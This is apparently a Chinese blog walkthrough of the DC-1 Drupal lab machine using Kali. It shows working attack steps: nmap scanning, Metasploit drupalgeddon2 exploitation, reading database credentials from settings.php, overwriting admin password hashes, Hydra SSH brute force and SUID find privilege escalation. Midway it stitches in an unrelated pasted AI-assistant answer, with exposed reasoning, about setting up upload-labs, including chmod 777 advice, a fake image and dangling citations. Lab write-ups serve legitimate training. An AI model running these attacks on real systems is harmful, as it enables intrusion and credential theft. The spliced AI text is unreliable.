kali渗透DC-1靶场搭建及渗透

一.环境搭建

1.准备工具

kali

安装教程

DC-1靶机

官网下载DC-1
VMware直接导入镜像即可

导入选择路径即可
设置好相关操作
这样就成功了
出现这个界面就表示开启成功了。
然后再更改kali的网络连接模式为桥接模式,让DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机,当然也可以设置为net,但必须DC-1靶机也设为net。

二.渗透过程

1.信息收集

IP地址收集

探测主机的工具有很多,常见的有arp-scan、nmap还有netdiscover等

arp-scan -l

该命令是探测当前网段的所有ip地址
在这里插入图片描述

然后查看靶机的mac地址,确定靶机的IP地址
在这里插入图片描述
DC-1的IP地址为

192.168.178.89

查看主机kali的IP地址

ifconfig

在这里插入图片描述

192.168.178.245

(查看自己电脑上的IP地址,每台电脑给虚拟机分配的IP地址不一样)

再用nmap

nmap -sP 192.168.178.0/24

ip后面改为了0/24, 在这里“192.168.178.0/24”表示的是这个网段的IP地址从从192.168.120.1开始,到192.168.178.254结束(192.168.1780.0和192.168.178.255有特殊含义不能当做ip地址);子网掩码是255.255.255.0

在这里插入图片描述
用netdiscover一样扫出IP

netdiscover

在这里插入图片描述

IP开放端口收集

用nmap来探测靶机开放端口

nmap -sV -p- 192.168.178.89

-sV 扫描目标主机端口上运行的软件信息

-p- 扫描全部端口0-65535
在这里插入图片描述
20和80端口是我们的突破口,80是http协议,我们用浏览器访问

网页信息收集

使用kali自带的工具whatweb扫描

whatweb -v 192.168.178.89

在这里插入图片描述
扫出CMS,然后再用dirsearch工具扫一下目录

dirsearch -u 192.168.178.89

在这里插入图片描述
扫描出来了特别多目录,基本上用不上
有用的信息

CMS是Drupal
Apache 2.2.22

PHP 5.4.45

jQuery 1.4.4 

2.漏洞利用

知道了cms,我们可以从cms出发寻找漏洞(直接度娘),搜索一下drupal漏洞
在这里插入图片描述

查找

用Metasploit ,找一下漏洞,先打开工具
在这里插入图片描述

search Drupal

在这里插入图片描述
Drupal 框架漏洞还是有很多的,这里我们用漏洞等级高,且时间较新的2018年漏洞渗透

利用

利用漏洞

use exploit/unix/webapp/drupal_drupalgeddon2

在这里插入图片描述
然后查看一下这个漏洞模块的参数

show options

在这里插入图片描述
Current Setting是目前设置的内容

Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置

就上面来说RHOSTS需要set,但是没有内容

所以我们设置一下RHOSTS的内容(靶机的IP地址)

set RHOSTS 192.168.178.89

然后查看一下是否设置好了模块参数
在这里插入图片描述
设置好了参数开始渗透攻击

run

这里也可以用exploit(效果一样)
在这里插入图片描述
出现Meterpreter session 1 opened(kali和目标ip的连接)就说明攻击成功啦,接下来我们可以直接上shell

3.1获取shell

获取普通shell

shell

在这里插入图片描述
这是普通shell,然后执行一下ls

ls

在这里插入图片描述
成功

获取交互shell

利用python实现互交shell(这样就好看一点),使用的前提是攻击主机上必须装有python## 3.2数据库渗透

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述
可以看到这个shell的权限只是普通权限,还不是root,不过还能看看文件啦,先看一下发现的flag1.txt文件
在这里插入图片描述
每个好的CMS都需要一个配置文件,你也一样

再看看其他的flag,根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径挺复杂的不过知道名字叫settings.php,我们可以用命令直接搜索并打开,内联执行

cat `find / -name settings.php`

在这里插入图片描述
找到了flag2(好像不重要的样子),还意外收获了一个数据库,给了账号密码,先登一下看看

3.2 数据库渗透

登陆给的账号密码
mysql -udbuser -pR0ck3t

在这里插入图片描述

登进去了,这样我们就可以修改数据库了,先看一下有什么

show datebases;

在这里插入图片描述
接着使用改数据库,并查看表

use drupaldb;show tables;

在这里插入图片描述
注意到users这个表,查看一下

select * from users;

得到两个用户
在这里插入图片描述

| admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |

 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |

密码好复杂,应该不是明文,那想登进后台就很难了就很难了,我们可以通过修改admin的密码,或者是新加一个admin

修改admin的密码
我们得先找到加密文件,Drupal的加密脚本在目录下

/var/www/scripts/password-hash.sh

我们先退出mysql

exit;

打开加密的脚本

cat /var/www/scripts/password-hash.sh

在这里插入图片描述
这个脚本是用php写的,而且还能用php加参数运行,直接得到加密后的密码,这里我们设置一个密码123456 (可以随便设置)

php /var/www/scripts/password-hash.sh 123456

在这里插入图片描述
得到加密后的密码, 接着我们登入mysql修改一下admin跟Fred的密码

mysql -udbuser -pR0ck3t
 
use drupaldb;update users set pass = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin' or name = 'Fred';

密码修改成功

4.用户密码爆破

利用工具Hydra爆破flag4的密码

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.178.89

爆破出密码orange,然后我们用kali连接

ssh flag4@192.168.178.89

输入orange登入
在这里插入图片描述
打开了flag4.txt

5.linux提权

利用find命令,找查具有SUID权限的可执行二进制文件

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
执行root权限的命令找查文件

find / -name index.php -exec "/bin/sh" \;

在这里插入图片描述
已经提权成功了,接下来我们只要找到剩下的flag文件就算通关啦

cd /root 
ls
cat *

在这里插入图片描述
拿下!

<think>好的,用户想了解如何在Kali Linux上安装和搭建upload-labs靶场。我需要提供一个清晰的步骤指南,确保每个环节都正确无误。首先,我应该考虑upload-labs的基本要求,比如PHP环境和数据库支持。Kali Linux默认可能已经安装了Apache和PHP,但可能需要确认版本是否兼容。用户可能需要安装Git来克隆仓库,所以第一步应该是更新系统并安装必要的依赖。 接下来,下载upload-labs项目。通常项目托管在GitHub上,所以使用git clone命令是标准做法。然后检查目标目录是否正确,比如是否放在/var/www/html/下,这是Apache的默认根目录。可能需要调整文件夹权限,确保Apache有读取权限。 然后配置Apache服务器。可能需要启用mod_rewrite,并调整虚拟主机设置。需要提醒用户检查Apache服务是否运行,以及防火墙设置是否允许HTTP流量。数据库方面,如果upload-labs需要MySQL,可能需要安装MariaDB并创建数据库,但根据我的记忆,upload-labs主要是文件上传漏洞练习,可能不需要数据库。不过需要确认这一点,避免遗漏步骤。 安装完成后,访问本地IP或localhost应该就能进入靶场。常见问题可能包括权限不足、端口冲突或者PHP模块未启用。比如,如果遇到500错误,可能需要检查PHP错误日志,或者确保.htaccess文件正确配置。此外,可能需要修改文件上传目录的权限,确保可写。 用户可能遇到的另一个问题是环境配置错误,比如PHP版本过高导致兼容性问题。这时需要降低PHP版本或修改代码适配。另外,SELinux或AppArmor可能会阻止Apache写入文件,需要临时关闭或调整策略。 最后,确保整个流程步骤清晰,语言简洁,避免使用复杂术语,让新手也能跟随操作。同时,生成的相关问题要针对常见后续疑问,比如环境配置、故障排除和靶场使用,帮助用户进一步学习。</think>### Kali Linux安装upload-labs靶场步骤 #### 一、环境准备 1. 更新系统包 ```bash sudo apt update && sudo apt upgrade -y ``` 2. 安装Apache和PHP ```bash sudo apt install apache2 php libapache2-mod-php -y ``` 3. 安装MySQL(可选,部分靶场需要) ```bash sudo apt install mariadb-server php-mysql -y ``` #### 二、下载upload-labs 1. 克隆Git仓库 ```bash cd /var/www/html/ sudo git clone https://github.com/c0ny1/upload-labs.git ``` 2. 设置目录权限 ```bash sudo chown -R www-data:www-data upload-labs/ sudo chmod -R 755 upload-labs/ ``` #### 三、配置Apache 1. 启用rewrite模块 ```bash sudo a2enmod rewrite ``` 2. 重启Apache服务 ```bash sudo systemctl restart apache2 ``` #### 四、访问靶场 浏览器访问: ``` http://localhost/upload-labs/ ``` ![靶场界面示例](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAAAyCAYAAAAeP4ixAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAOxAAADsQBlSsOGwAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAAI5SURBVGiB7dpPaE1xHMfx9/6QYtFCi4WUJEWK1L2GxGKhLDQbC6VkYWNhQ5QsLJQsbCwsLBSFQkqSFEkpRblS7r3m/n5Z3O7q6XfOOffe3zn3dH6r0/2d8/2d7zn3d8/53XOklFJKKaWUUkoppZRSSimllFJKKaV+O4M9yB1gFNgCzADGgRfAHeBd2Qk7BbkKbAQWAEuBNcAm4B5wCbhQZtJOQcYy2suAo8A24BhwHnhcZOIiQbJMAQ4Cu4DDwBHgRZGBygYJzQZOAnuA/cCjvAOUDRJaD5wCdgJ7gRdZLy4bZBx4DLwC3gPfgB/AJ+Bm+9g8YFm7b3aRicoGuQ7sBt4Ck8BP4Gv78zfgfPvYOuBskYnKBpkAruTo9xV4XnSiskHy6mn1k4H9wGHgJPAkT2eTIKuB08B24ECeziZB1gJngC3A3jydTYKsA84C64FdeTqbBFkJnAPWAJvzdDYJshg4D6wCNubpbBJkHnABWAGsztPZJMgM4CKwFFiWp7NJkGnAJWAxsDBPZ5MgU4HLwEJgXp7OJkEmA1eA+cDcPJ1NgvwArgFzgNl5OpsE+QlcBWYDs/J0NgnyE7gBzARm5OlsEuQXcBOYDkzP09kkyDhwC5gGTMvT2STIL+B2u206T2eTIPeBSe0guf5oJkEeAhPtILn+aCZBHgHf20Fy/dFMgjwBPrWD5PqjmQR5CnxoB8n1RzMJ8gx42w6S649mEuQ58LodJNcfzSTIC+BFO0iuP5pJkJfA03aQXH80kyCvgEftILn+aCZBXgP32kFy/dFMgjwAbrWD5PqjmQR5ClxvB8n1RzMJ8gq40g6S649mEuQ1cLkdJNcfzSTIG+BiO0iuP5pJkHfA+XaQXH80kyAfgDPtILn+aCZBPrY+zrSD5PqjmQT51Po43Q6S649mEuRz6+NUO0iuP5pJkC+tjxPtILn+aCZBvrU+jreD5PqjmQT53vo41g6S649mEuRH6+NoO0iuP5pJkPHWx5F2kFx/NJMgE62Pw+0guf5oJkEmWx8H20Fy/dFMgvxsfexvB8n1RzMJ8qv1sa8dJNcfzSTIROtjbztIrj+aSZDJ1seudpBcfzSTIP8Bw3TpXxVw/1QAAAAASUVORK5CYII=) #### 五、常见问题解决 1. **403禁止访问错误** 修改Apache配置: ```bash sudo nano /etc/apache2/apache2.conf ``` 找到`<Directory /var/www/>`段落,将`AllowOverride None`改为`AllowOverride All` 2. **文件上传失败** 检查上传目录权限: ```bash sudo chmod 777 /var/www/html/upload-labs/upload/ ``` [^1]: 引用包含系统信息查看和目录操作相关内容 [^2]: 引用涉及PHP环境搭建和漏洞利用过程
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值